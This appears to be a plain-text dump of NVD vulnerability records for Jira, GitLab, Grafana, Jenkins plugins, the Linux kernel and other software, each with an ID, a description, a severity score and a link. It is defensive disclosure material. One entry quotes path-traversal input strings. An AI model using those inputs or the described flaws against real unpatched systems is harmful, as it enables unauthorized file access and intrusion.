CVE-2021-29425 In Apache Commons IO before 2.7, When invoking the method FileNameUtils.normalize with an improper input string, like "//../foo", or "\\\\..\\foo", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus "limited" path traversal), if the calling code would use the result to construct a path value. 4.8 https://nvd.nist.gov/vuln/detail/CVE-2021-29425
CVE-2021-39112 Affected versions of Atlassian Jira Server and Data Center allow remote attackers to redirect users to a malicious URL via a reverse tabnapping vulnerability in the Project Shortcuts feature. The affected versions are before version 8.5.15, from version 8.6.0 before 8.13.7, from version 8.14.0 before 8.17.1, and from version 8.18.0 before 8.18.1. 4.8 https://nvd.nist.gov/vuln/detail/CVE-2021-39112
CVE-2021-24900 The Ninja Tables WordPress plugin before 4.1.8 does not sanitise and escape some of its table fields, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed 4.8 https://nvd.nist.gov/vuln/detail/CVE-2021-24900
CVE-2022-0388 The Interactive Medical Drawing of Human Body WordPress plugin through 1.0 does not sanitise and escape the Link field, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. 4.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0388
CVE-2022-1163 Cross-site Scripting (XSS) - Stored in GitHub repository mineweb/minewebcms prior to next. 4.8 https://nvd.nist.gov/vuln/detail/CVE-2022-1163
CVE-2019-19965 In the Linux kernel through 5.4.6, there is a NULL pointer dereference in drivers/scsi/libsas/sas_discover.c because of mishandling of port disconnection during discovery, related to a PHY down race condition, aka CID-f70267f379b5. 4.7 https://nvd.nist.gov/vuln/detail/CVE-2019-19965
CVE-2019-20100 The Atlassian Application Links plugin is vulnerable to cross-site request forgery (CSRF). The following versions are affected: all versions prior to 5.4.21, from version 6.0.0 before version 6.0.12, from version 6.1.0 before version 6.1.2, from version 7.0.0 before version 7.0.2, and from version 7.1.0 before version 7.1.3. The vulnerable plugin is used by Atlassian Jira Server and Data Center before version 8.7.0. An attacker could exploit this by tricking an administrative user into making malicious HTTP requests, allowing the attacker to enumerate hosts and open ports on the internal network where Jira server is present. 4.7 https://nvd.nist.gov/vuln/detail/CVE-2019-20100
CVE-2020-1740 A flaw was found in Ansible Engine when using Ansible Vault for editing encrypted files. When a user executes "ansible-vault edit", another user on the same computer can read the old and new secret, as it is created in a temporary file with mkstemp and the returned file descriptor is closed and the method write_data is called to write the existing secret in the file. This method will delete the file before recreating it insecurely. All versions in 2.7.x, 2.8.x and 2.9.x branches are believed to be vulnerable. 4.7 https://nvd.nist.gov/vuln/detail/CVE-2020-1740
CVE-2021-29113 A remote file inclusion vulnerability in the ArcGIS Server help documentation may allow a remote, unauthenticated attacker to inject attacker supplied html into a page. 4.7 https://nvd.nist.gov/vuln/detail/CVE-2021-29113
CVE-2019-19536 In the Linux kernel before 5.2.9, there is an info-leak bug that can be caused by a malicious USB device in the drivers/net/can/usb/peak_usb/pcan_usb_pro.c driver, aka CID-ead16e53c2f0. 4.6 https://nvd.nist.gov/vuln/detail/CVE-2019-19536
CVE-2020-1735 A flaw was found in the Ansible Engine when the fetch module is used. An attacker could intercept the module, inject a new path, and then choose a new destination path on the controller node. All versions in 2.7.x, 2.8.x and 2.9.x branches are believed to be vulnerable. 4.6 https://nvd.nist.gov/vuln/detail/CVE-2020-1735
CVE-2021-0004 Improper buffer restrictions in the firmware of Intel(R) Ethernet Adapters 800 Series Controllers and associated adapters before version 1.5.3.0 may allow a privileged user to potentially enable denial of service via local access. 4.4 https://nvd.nist.gov/vuln/detail/CVE-2021-0004
CVE-2019-10732 In KDE KMail 5.2.3, an attacker in possession of S/MIME or PGP encrypted emails can wrap them as sub-parts within a crafted multipart email. The encrypted part(s) can further be hidden using HTML/CSS or ASCII newline characters. This modified multipart email can be re-sent by the attacker to the intended receiver. If the receiver replies to this (benign looking) email, they unknowingly leak the plaintext of the encrypted message part(s) back to the attacker. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2019-10732
CVE-2019-4045 IBM Business Automation Workflow and IBM Business Process Manager 18.0.0.0, 18.0.0.1, and 18.0.0.2 provide embedded document management features. Because of a missing restriction in an API, a client might spoof the last modified by value of a document. IBM X-Force ID: 156241. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2019-4045
CVE-2019-20106 Comment properties in Atlassian Jira Server and Data Center before version 7.13.12, from 8.0.0 before version 8.5.4, and 8.6.0 before version 8.6.1 allows remote attackers to make comments on a ticket to which they do not have commenting permissions via a broken access control bug. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2019-20106
CVE-2019-20404 The API in Atlassian Jira Server and Data Center before version 8.6.0 allows authenticated remote attackers to determine project titles they do not have access to via an improper authorization vulnerability. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2019-20404
CVE-2019-20405 The JMX monitoring flag in Atlassian Jira Server and Data Center before version 8.6.0 allows remote attackers to turn the JMX monitoring flag off or on via a Cross-site request forgery (CSRF) vulnerability. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2019-20405
CVE-2020-6403 Incorrect implementation in Omnibox in Google Chrome on iOS prior to 80.0.3987.87 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2020-6403
CVE-2019-20098 The VerifySmtpServerConnection!add.jspa component in Atlassian Jira Server and Data Center before version 8.7.0 is vulnerable to cross-site request forgery (CSRF). An attacker could exploit this by tricking an administrative user into making malicious HTTP requests, allowing the attacker to enumerate hosts and open ports on the internal network where Jira server is present. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2019-20098
CVE-2019-20099 The VerifyPopServerConnection!add.jspa component in Atlassian Jira Server and Data Center before version 8.7.0 is vulnerable to cross-site request forgery (CSRF). An attacker could exploit this by tricking an administrative user into making malicious HTTP requests, allowing the attacker to enumerate hosts and open ports on the internal network where Jira server is present. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2019-20099
CVE-2019-20407 The ConfigureBambooRelease resource in Jira Software and Jira Software Data Center before version 8.6.1 allows authenticated remote attackers to view release version information in projects that they do not have access to through an missing authorisation check. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2019-20407
CVE-2020-13230 In Cacti before 1.2.11, disabling a user account does not immediately invalidate any permissions granted to that account (e.g., permission to view logs). 4.3 https://nvd.nist.gov/vuln/detail/CVE-2020-13230
CVE-2019-20411 Affected versions of Atlassian Jira Server and Data Center allow remote attackers to modify Wallboard settings via a Cross-site request forgery (CSRF) vulnerability. The affected versions are before version 7.13.9, and from version 8.0.0 before 8.4.2. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2019-20411
CVE-2019-20415 Atlassian Jira Server and Data Center in affected versions allows remote attackers to modify logging and profiling settings via a cross-site request forgery (CSRF) vulnerability. The affected versions are before version 7.13.3, and from version 8.0.0 before 8.1.0. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2019-20415
CVE-2020-4029 The /rest/project-templates/1.0/createshared resource in Atlassian Jira Server and Data Center before version 8.5.5, from 8.6.0 before 8.7.2, and from 8.8.0 before 8.8.1 allows remote attackers to enumerate project names via an improper authorization vulnerability. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2020-4029
CVE-2020-14174 Affected versions of Atlassian Jira Server and Data Center allow remote attackers to view titles of a private project via an Insecure Direct Object References (IDOR) vulnerability in the Administration Permission Helper. The affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, from version 8.6.0 before 8.9.2, and from version 8.10.0 before 8.10.1. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2020-14174
CVE-2020-36231 Affected versions of Atlassian Jira Server and Data Center allow remote attackers to view the metadata of boards they should not have access to via an Insecure Direct Object References (IDOR) vulnerability. The affected versions are before version 8.5.10, and from version 8.6.0 before 8.13.2. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2020-36231
CVE-2021-26075 The Jira importers plugin AttachTemporaryFile rest resource in Jira Server and Data Center before version 8.5.12, from version 8.6.0 before 8.13.4, and from version 8.14.0 before 8.15.1 allowed remote authenticated attackers to obtain the full path of the Jira application data directory via an information disclosure vulnerability in the error message when presented with an invalid filename. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2021-26075
CVE-2021-32056 Cyrus IMAP before 3.2.7, and 3.3.x and 3.4.x before 3.4.1, allows remote authenticated users to bypass intended access restrictions on server annotations and consequently cause replication to stall. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2021-32056
CVE-2021-39121 Affected versions of Atlassian Jira Server and Data Center allow authenticated remote attackers to enumerate the keys of private Jira projects via an Information Disclosure vulnerability in the /rest/api/latest/projectvalidate/key endpoint. The affected versions are before version 8.5.18, from version 8.6.0 before 8.13.10, and from version 8.14.0 before 8.18.2. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2021-39121
CVE-2021-37971 Incorrect security UI in Web Browser UI in Google Chrome prior to 94.0.4606.54 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2021-37971
CVE-2021-43813 Grafana is an open-source platform for monitoring and observability. Grafana prior to versions 8.3.2 and 7.5.12 contains a directory traversal vulnerability for fully lowercase or fully uppercase .md files. The vulnerability is limited in scope, and only allows access to files with the extension .md to authenticated users only. Grafana Cloud instances have not been affected by the vulnerability. Users should upgrade to patched versions 8.3.2 or 7.5.12. For users who cannot upgrade, running a reverse proxy in front of Grafana that normalizes the PATH of the request will mitigate the vulnerability. The proxy will have to also be able to handle url encoded paths. Alternatively, for fully lowercase or fully uppercase .md files, users can block /api/plugins/.*/markdown/.* without losing any functionality beyond inlined plugin help text. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2021-43813
CVE-2021-43815 Grafana is an open-source platform for monitoring and observability. Grafana prior to versions 8.3.2 and 7.5.12 has a directory traversal for arbitrary .csv files. It only affects instances that have the developer testing tool called TestData DB data source enabled and configured. The vulnerability is limited in scope, and only allows access to files with the extension .csv to authenticated users only. Grafana Cloud instances have not been affected by the vulnerability. Versions 8.3.2 and 7.5.12 contain a patch for this issue. There is a workaround available for users who cannot upgrade. Running a reverse proxy in front of Grafana that normalizes the PATH of the request will mitigate the vulnerability. The proxy will have to also be able to handle url encoded paths. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2021-43815
CVE-2022-0833 The Church Admin WordPress plugin before 3.4.135 does not have authorisation and CSRF in some of its action as well as requested files, allowing unauthenticated attackers to repeatedly request the "refresh-backup" action, and simultaneously keep requesting a publicly accessible temporary file generated by the plugin in order to disclose the final backup filename, which can then be fetched by the attacker to download the backup of the plugin's DB data 4.3 https://nvd.nist.gov/vuln/detail/CVE-2022-0833
CVE-2021-39876 In all versions of GitLab CE/EE since version 11.3, the endpoint for auto-completing Assignee discloses the members of private groups. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2021-39876
CVE-2022-0344 An issue has been discovered in GitLab affecting all versions starting from 10.0 before 14.5.4, all versions starting from 10.1 before 14.6.4, all versions starting from 10.2 before 14.7.1. Private project paths can be disclosed to unauthorized users via system notes when an Issue is closed via a Merge Request and later moved to a public project 4.3 https://nvd.nist.gov/vuln/detail/CVE-2022-0344
CVE-2022-0371 An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.4 before 14.5.4, all versions starting from 14.6 before 14.6.4, all versions starting from 14.7 before 14.7.1. GitLab search may allow authenticated users to search other users by their respective private emails even if a user set their email to private. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2022-0371
CVE-2022-0488 An issue has been discovered in GitLab CE/EE affecting all versions starting with version 8.10. It was possible to trigger a timeout on a page with markdown by using a specific amount of block-quotes. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2022-0488
CVE-2021-43105 A vulnerability in the bailiwick checking function in Technitium DNS Server <= v7.0 exists that allows specific malicious users to inject `NS` records of any domain (even TLDs) into the cache and conduct a DNS cache poisoning attack. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2021-43105
CVE-2022-28137 A missing permission check in Jenkins JiraTestResultReporter Plugin 165.v817928553942 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2022-28137
CVE-2022-28138 A cross-site request forgery (CSRF) vulnerability in Jenkins RocketChat Notifier Plugin 1.4.10 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credential. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2022-28138
CVE-2022-28139 A missing permission check in Jenkins RocketChat Notifier Plugin 1.4.10 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2022-28139
CVE-2022-28147 A missing permission check in Jenkins Continuous Integration with Toad Edge Plugin 2.3 and earlier allows attackers with Overall/Read permission to check for the existence of an attacker-specified file path on the Jenkins controller file system. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2022-28147
CVE-2022-28151 A missing permission check in Jenkins Job and Node ownership Plugin 0.13.0 and earlier allows attackers with Item/Read permission to change the owners and item-specific permissions of a job. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2022-28151
CVE-2022-28152 A cross-site request forgery (CSRF) vulnerability in Jenkins Job and Node ownership Plugin 0.13.0 and earlier allows attackers to restore the default ownership of a job. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2022-28152
CVE-2022-1177 Accounting User Can Download Patient Reports in openemr in GitHub repository openemr/openemr prior to 6.1.0. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2022-1177
CVE-2022-24523 Microsoft Edge (Chromium-based) Spoofing Vulnerability. 4.3 https://nvd.nist.gov/vuln/detail/CVE-2022-24523
CVE-2017-6770 Cisco IOS 12.0 through 15.6, Adaptive Security Appliance (ASA) Software 7.0.1 through 9.7.1.2, NX-OS 4.0 through 12.0, and IOS XE 3.6 through 3.18 are affected by a vulnerability involving the Open Shortest Path First (OSPF) Routing Protocol Link State Advertisement (LSA) database. This vulnerability could allow an unauthenticated, remote attacker to take full control of the OSPF Autonomous System (AS) domain routing table, allowing the attacker to intercept or black-hole traffic. The attacker could exploit this vulnerability by injecting crafted OSPF packets. Successful exploitation could cause the targeted router to flush its routing table and propagate the crafted OSPF LSA type 1 update throughout the OSPF AS domain. To exploit this vulnerability, an attacker must accurately determine certain parameters within the LSA database on the target router. This vulnerability can only be triggered by sending crafted unicast or multicast OSPF LSA type 1 packets. No other LSA type packets can trigger this vulnerability. OSPFv3 is not affected by this vulnerability. Fabric Shortest Path First (FSPF) protocol is not affected by this vulnerability. Cisco Bug IDs: CSCva74756, CSCve47393, CSCve47401. 4.2 https://nvd.nist.gov/vuln/detail/CVE-2017-6770
CVE-2021-2010 Vulnerability in the MySQL Client product of Oracle MySQL (component: C API). Supported versions that are affected are 5.6.50 and prior, 5.7.32 and prior and 8.0.22 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Client. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Client accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Client. CVSS 3.1 Base Score 4.2 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L). 4.2 https://nvd.nist.gov/vuln/detail/CVE-2021-2010
CVE-2020-25656 A flaw was found in the Linux kernel. A use-after-free was found in the way the console subsystem was using ioctls KDGKBSENT and KDSKBSENT. A local user could use this flaw to get read memory access out of bounds. The highest threat from this vulnerability is to data confidentiality. 4.1 https://nvd.nist.gov/vuln/detail/CVE-2020-25656
CVE-2022-27820 OWASP Zed Attack Proxy (ZAP) through w2022-03-21 does not verify the TLS certificate chain of an HTTPS server. 4 https://nvd.nist.gov/vuln/detail/CVE-2022-27820
CVE-2020-1739 A flaw was found in Ansible 2.7.16 and prior, 2.8.8 and prior, and 2.9.5 and prior when a password is set with the argument "password" of svn module, it is used on svn command line, disclosing to other users within the same node. An attacker could take advantage by reading the cmdline file from that particular PID on the procfs. 3.9 https://nvd.nist.gov/vuln/detail/CVE-2020-1739
CVE-2021-1998 Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Server. CVSS 3.1 Base Score 3.8 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L). 3.8 https://nvd.nist.gov/vuln/detail/CVE-2021-1998
CVE-2021-3593 An invalid pointer initialization issue was found in the SLiRP networking implementation of QEMU. The flaw exists in the udp6_input() function and could occur while processing a udp packet that is smaller than the size of the 'udphdr' structure. This issue may lead to out-of-bounds read access or indirect host memory disclosure to the guest. The highest threat from this vulnerability is to data confidentiality. This flaw affects libslirp versions prior to 4.6.0. 3.8 https://nvd.nist.gov/vuln/detail/CVE-2021-3593
CVE-2019-9942 A sandbox information disclosure exists in Twig before 1.38.0 and 2.x before 2.7.0 because, under some circumstances, it is possible to call the __toString() method on an object even if not allowed by the security policy in place. 3.7 https://nvd.nist.gov/vuln/detail/CVE-2019-9942
CVE-2020-8284 A malicious server can use the FTP PASV response to trick curl 7.73.0 and earlier into connecting back to a given IP address and port, and this way potentially make curl extract information about services that are otherwise private and not disclosed, for example doing port scanning and service banner extractions. 3.7 https://nvd.nist.gov/vuln/detail/CVE-2020-8284
CVE-2021-2007 Vulnerability in the MySQL Client product of Oracle MySQL (component: C API). Supported versions that are affected are 5.6.47 and prior, 5.7.29 and prior and 8.0.19 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Client. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Client accessible data. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). 3.7 https://nvd.nist.gov/vuln/detail/CVE-2021-2007
CVE-2021-26076 The jira.editor.user.mode cookie set by the Jira Editor Plugin in Jira Server and Data Center before version 8.5.12, from version 8.6.0 before version 8.13.4, and from version 8.14.0 before version 8.15.0 allows remote anonymous attackers who can perform an attacker in the middle attack to learn which mode a user is editing in due to the cookie not being set with a secure attribute if Jira was configured to use https. 3.7 https://nvd.nist.gov/vuln/detail/CVE-2021-26076
CVE-2022-21248 Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Serialization). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). 3.7 https://nvd.nist.gov/vuln/detail/CVE-2022-21248
CVE-2022-24784 Statamic is a Laravel and Git powered CMS. Before versions 3.2.39 and 3.3.2, it is possible to confirm a single character of a user's password hash using a specially crafted regular expression filter in the users endpoint of the REST API. Multiple such requests can eventually uncover the entire hash. The hash is not present in the response, however the presence or absence of a result confirms if the character is in the right position. The API has throttling enabled by default, making this a time intensive task. Both the REST API and the users endpoint need to be enabled, as they are disabled by default. The issue has been fixed in versions 3.2.39 and above, and 3.3.2 and above. 3.7 https://nvd.nist.gov/vuln/detail/CVE-2022-24784
CVE-2021-26071 The SetFeatureEnabled.jspa resource in Jira Server and Data Center before version 8.5.13, from version 8.6.0 before version 8.13.5, and from version 8.14.0 before version 8.15.1 allows remote anonymous attackers to enable and disable Jira Software configuration via a cross-site request forgery (CSRF) vulnerability. 3.5 https://nvd.nist.gov/vuln/detail/CVE-2021-26071
CVE-2022-1180 Reflected Cross Site Scripting in GitHub repository openemr/openemr prior to 6.0.0.4. 3.5 https://nvd.nist.gov/vuln/detail/CVE-2022-1180
CVE-2019-8934 hw/ppc/spapr.c in QEMU through 3.1.0 allows Information Exposure because the hypervisor shares the /proc/device-tree/system-id and /proc/device-tree/model system attributes with a guest. 3.3 https://nvd.nist.gov/vuln/detail/CVE-2019-8934
CVE-2019-17055 base_sock_create in drivers/isdn/mISDN/socket.c in the AF_ISDN network module in the Linux kernel through 5.3.2 does not enforce CAP_NET_RAW, which means that unprivileged users can create a raw socket, aka CID-b91ee4aa2a21. 3.3 https://nvd.nist.gov/vuln/detail/CVE-2019-17055
CVE-2020-1736 A flaw was found in Ansible Engine when a file is moved using atomic_move primitive as the file mode cannot be specified. This sets the destination files world-readable if the destination file does not exist and if the file exists, the file could be changed to have less restrictive permissions before the move. This could lead to the disclosure of sensitive data. All versions in 2.7.x, 2.8.x and 2.9.x branches are believed to be vulnerable. 3.3 https://nvd.nist.gov/vuln/detail/CVE-2020-1736
CVE-2020-9773 The issue was addressed with improved handling of icon caches. This issue is fixed in iOS 14.0 and iPadOS 14.0. A malicious application may be able to identify what other applications a user has installed. 3.3 https://nvd.nist.gov/vuln/detail/CVE-2020-9773
CVE-2021-39865 Adobe Framemaker versions 2019 Update 8 (and earlier) and 2020 Release Update 2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 3.3 https://nvd.nist.gov/vuln/detail/CVE-2021-39865
CVE-2021-42069 When a user opens manipulated Tagged Image File Format (.tif) file received from untrusted sources in SAP 3D Visual Enterprise Viewer - version 9.0, the application crashes and becomes temporarily unavailable to the user until restart of the application 3.3 https://nvd.nist.gov/vuln/detail/CVE-2021-42069
CVE-2021-39739 In ArrayMap, there is a possible leak of the content of SMS messages due to log information disclosure. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-184525194 3.3 https://nvd.nist.gov/vuln/detail/CVE-2021-39739
CVE-2022-26354 A flaw was found in the vhost-vsock device of QEMU. In case of error, an invalid element was not detached from the virtqueue before freeing its memory, leading to memory leakage and other unexpected results. Affected QEMU versions <= 6.2.0. 3.2 https://nvd.nist.gov/vuln/detail/CVE-2022-26354
CVE-2018-25030 A vulnerability classified as problematic has been found in Mirmay Secure Private Browser and File Manager up to 2.5. Affected is the Auto Lock. A race condition leads to a local authentication bypass. The exploit has been disclosed to the public and may be used. 2.5 https://nvd.nist.gov/vuln/detail/CVE-2018-25030
CVE-2019-19534 In the Linux kernel before 5.3.11, there is an info-leak bug that can be caused by a malicious USB device in the drivers/net/can/usb/peak_usb/pcan_usb_core.c driver, aka CID-f7a1337f0d29. 2.4 https://nvd.nist.gov/vuln/detail/CVE-2019-19534
CVE-2020-9959 A lock screen issue allowed access to messages on a locked device. This issue was addressed with improved state management. This issue is fixed in iOS 14.0 and iPadOS 14.0. A person with physical access to an iOS device may be able to view notification contents from the lockscreen. 2.4 https://nvd.nist.gov/vuln/detail/CVE-2020-9959
CVE-2011-2581 The ACL implementation in Cisco NX-OS 5.0(2) and 5.0(3) before 5.0(3)N2(1) on Nexus 5000 series switches, and NX-OS before 5.0(3)U1(2a) on Nexus 3000 series switches, does not properly handle comments in conjunction with deny statements, which allows remote attackers to bypass intended access restrictions in opportunistic circumstances by sending packets, aka Bug IDs CSCto09813 and CSCtr61490. https://nvd.nist.gov/vuln/detail/CVE-2011-2581
CVE-2022-1122 A flaw was found in the opj2_decompress program in openjpeg2 2.4.0 in the way it handles an input directory with a large number of files. When it fails to allocate a buffer to store the filenames of the input directory, it calls free() on an uninitialized pointer, leading to a segmentation fault and a denial of service. https://nvd.nist.gov/vuln/detail/CVE-2022-1122
CVE-2022-26871 An arbitrary file upload vulnerability in Trend Micro Apex Central could allow an unauthenticated remote attacker to upload an arbitrary file which could lead to remote code execution. https://nvd.nist.gov/vuln/detail/CVE-2022-26871
CVE-2021-44082 textpattern 4.8.7 is vulnerable to Cross Site Scripting (XSS) via /textpattern/index.php,Body. A remote and unauthenticated attacker can use XSS to trigger remote code execution by uploading a webshell. To do so they must first steal the CSRF token before submitting a file upload request. https://nvd.nist.gov/vuln/detail/CVE-2021-44082
CVE-2015-3298 Yubico ykneo-openpgp before 1.0.10 has a typo in which an invalid PIN can be used. When first powered up, a signature will be issued even though the PIN has not been validated. https://nvd.nist.gov/vuln/detail/CVE-2015-3298
CVE-2022-24693 Baicells Nova436Q and Neutrino 430 devices with firmware through QRTB 2.7.8 have hardcoded credentials that are easily discovered, and can be used by remote attackers to authenticate via ssh. (The credentials are stored in the firmware, encrypted by the crypt function.) https://nvd.nist.gov/vuln/detail/CVE-2022-24693
CVE-2022-25619 Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in ping tool of Profelis IT Consultancy SambaBox allows AUTHENTICATED user to cause run arbitrary code. This issue affects: Profelis IT Consultancy SambaBox 4.0 version 4.0 and prior versions on x86. https://nvd.nist.gov/vuln/detail/CVE-2022-25619
CVE-2022-25620 Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Group Functionality of Profelis IT Consultancy SambaBox allows AUTHENTICATED user to cause execute arbitrary codes on the vulnerable server. This issue affects: Profelis IT Consultancy SambaBox 4.0 version 4.0 and prior versions on x86. https://nvd.nist.gov/vuln/detail/CVE-2022-25620
CVE-2020-35501 A flaw was found in the Linux kernels implementation of audit rules, where a syscall can unexpectedly not be correctly not be logged by the audit subsystem https://nvd.nist.gov/vuln/detail/CVE-2020-35501
CVE-2021-23850 A specially crafted TCP/IP packet may cause a camera recovery image telnet interface to crash. It may also cause a buffer overflow which could enable remote code execution. The recovery image can only be booted with administrative rights or with physical access to the camera and allows the upload of a new firmware in case of a damaged firmware. https://nvd.nist.gov/vuln/detail/CVE-2021-23850
CVE-2021-23851 A specially crafted TCP/IP packet may cause the camera recovery image web interface to crash. It may also cause a buffer overflow which could enable remote code execution. The recovery image can only be booted with administrative rights or with physical access to the camera and allows the upload of a new firmware in case of a damaged firmware. https://nvd.nist.gov/vuln/detail/CVE-2021-23851
CVE-2021-39772 In Bluetooth, there is a possible way to access the a2dp audio control switch due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-181962322 https://nvd.nist.gov/vuln/detail/CVE-2021-39772
CVE-2021-3456 An improper authorization handling flaw was found in Foreman. The Salt plugin for the smart-proxy allows foreman clients to execute actions that should be limited to the Foreman Server. This flaw allows an authenticated local attacker to access and delete limited resources and also causes a denial of service on the Foreman server. The highest threat from this vulnerability is to integrity and system availability. https://nvd.nist.gov/vuln/detail/CVE-2021-3456
CVE-2022-0998 An integer overflow flaw was found in the Linux kernel’s virtio device driver code in the way a user triggers the vhost_vdpa_config_validate function. This flaw allows a local user to crash or potentially escalate their privileges on the system. https://nvd.nist.gov/vuln/detail/CVE-2022-0998
CVE-2022-22996 The G-RAID 4/8 Software Utility setups for Windows were affected by a DLL hijacking vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the system user. https://nvd.nist.gov/vuln/detail/CVE-2022-22996
CVE-2022-23136 There is a stored XSS vulnerability in ZTE home gateway product. An attacker could modify the gateway name by inserting special characters and trigger an XSS attack when the user views the current topology of the device through the management page. https://nvd.nist.gov/vuln/detail/CVE-2022-23136
CVE-2022-27907 Sonatype Nexus Repository Manager 3.x before 3.38.0 allows SSRF. https://nvd.nist.gov/vuln/detail/CVE-2022-27907
CVE-2021-44310 An issue was discovered in Firmware Analysis and Comparison Tool v3.2. With administrator privileges, the attacker could perform stored XSS attacks by inserting JavaScript and HTML code in user creation functionality. https://nvd.nist.gov/vuln/detail/CVE-2021-44310
CVE-2021-44312 An issue was discovered in Firmware Analysis and Comparison Tool v3.2. Logged in administrators could be targeted by a CSRF attack through visiting a crafted web page. https://nvd.nist.gov/vuln/detail/CVE-2021-44312
CVE-2022-22772 The cfsend, cfrecv, and CyberResp components of TIBCO Software Inc.'s TIBCO Managed File Transfer Platform Server for UNIX and TIBCO Managed File Transfer Platform Server for z/Linux contain a difficult to exploit Remote Code Execution (RCE) vulnerability that allows a low privileged attacker with network access to execute arbitrary code on the affected system. Affected releases are TIBCO Software Inc.'s TIBCO Managed File Transfer Platform Server for UNIX: versions 8.1.0 and below and TIBCO Managed File Transfer Platform Server for z/Linux: versions 8.1.0 and below. https://nvd.nist.gov/vuln/detail/CVE-2022-22772
CVE-2022-24132 phpshe V1.8 is affected by a denial of service (DoS) attack in the registry's verification code, which can paralyze the target service. https://nvd.nist.gov/vuln/detail/CVE-2022-24132
CVE-2021-40645 An SQL Injection vulnerability exists in glorylion JFinalOA as of 9/7/2021 in the defkey parameter getHaveDoneTaskDataList method of the FlowTaskController. https://nvd.nist.gov/vuln/detail/CVE-2021-40645
CVE-2021-33581 MashZone NextGen through 10.7 GA has an SSRF vulnerability that allows an attacker to interact with arbitrary TCP services, by abusing the feature to check the availability of a PPM connection. This occurs in com.idsscheer.ppmmashup.web.webservice.impl.ZPrestoAdminWebService. https://nvd.nist.gov/vuln/detail/CVE-2021-33581
